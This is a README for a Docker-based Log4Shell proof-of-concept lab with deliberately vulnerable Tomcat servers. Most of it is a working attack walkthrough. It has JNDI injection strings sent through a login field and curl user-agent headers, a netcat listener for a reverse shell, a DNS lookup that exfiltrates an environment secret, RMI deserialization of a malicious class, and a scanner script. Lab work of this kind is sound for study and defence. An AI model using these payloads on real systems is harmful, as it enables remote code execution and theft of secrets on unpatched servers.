The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks.
The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc
This demo tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigued to use Log4J2 for logging - a non-standard configuration.
A newer Bitnami server is now available on port 8888. It is also is configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.
The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin
The detection script will check for user-agent vulnerablities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
This code requires Docker and Docker Compose
git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
# POC_ADDR is the address of the cve-poc container
# LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build
- Setup your docker listener in the first terminal
nc -lnvp 9001
- Start the docker containers in a second terminal
docker-compose up
- Navigate to the web app on port 8080
- Navigate to https://10.10.10.31:8080/log4shell
- Enter the username:
admin
- Enter the password:
password
- Select the "login" button
- See the welcome screen
- Enter the username:
- Return to login at https://10.10.10.31:8080/log4shell
- Enter the username
${jndi:ldap:https://172.16.238.11:1389/a}
- Select the "login" button
- Check for connection on your
nc
listener
- Enter the username
- Navigate to https://10.10.10.31:8080/log4shell
- Setup your docker listener in the first terminal
nc -lnvp 9001
- Start the docker containers in a second terminal
docker-compose up
- In a third terminal, run the following. The second IP is the docker host
curl -A "\${jndi:ldap:https://172.16.238.11:1389/a}" https://10.10.10.31:8080/log4shell
- Start the docker containers in a terminal
docker-compose up
- In a second terminal, run the following. The IP is the ip address of the docker host
curl -A "\${jndi:dns:https://10.10.10.31/\${env:POC_PASSWORD}}" https://10.10.10.31:8888/log4shell/
- The vulnerable web server will attempt to do a TXT lookup at the given IP. See log4j-dns_exfil.pcap
I am having issues with command line arg for ping target. So you have to compile yourself.
- Start the docker containers in a terminal
docker-compose up
- In another terminal, Login to the cve-poc
docker exec -it log4j-poc_cve-poc_1 /bin/bash
- Kill running RMIServerPOC instance
- Change to rmi-poc directory
cd /home/user/rmi-poc
- Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
- Recompile
javac -cp catalina.jar:. RMIServerPOC.java
- Run the Server
javac -cp catalina.jar:. RMIServerPOC 127.0.0.1
- Start the docker containers in a terminal
docker-compose up
- In a second terminal, run the following. The IP is the ip address of the docker host
curl -A "\${jndi:rmi:https://172.16.238.11:1097/Object}" https://10.10.10.31:8888/
- The vulnerable web server will download a serialized malicious class from the RMI server for a class which already exists in the Tomcat environment.
- This will ping the IP address defined in the compile section.
- cd scripts
python3 log4j_rce_check.py https://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
- you will have to kill the process, not sure yet why this hangs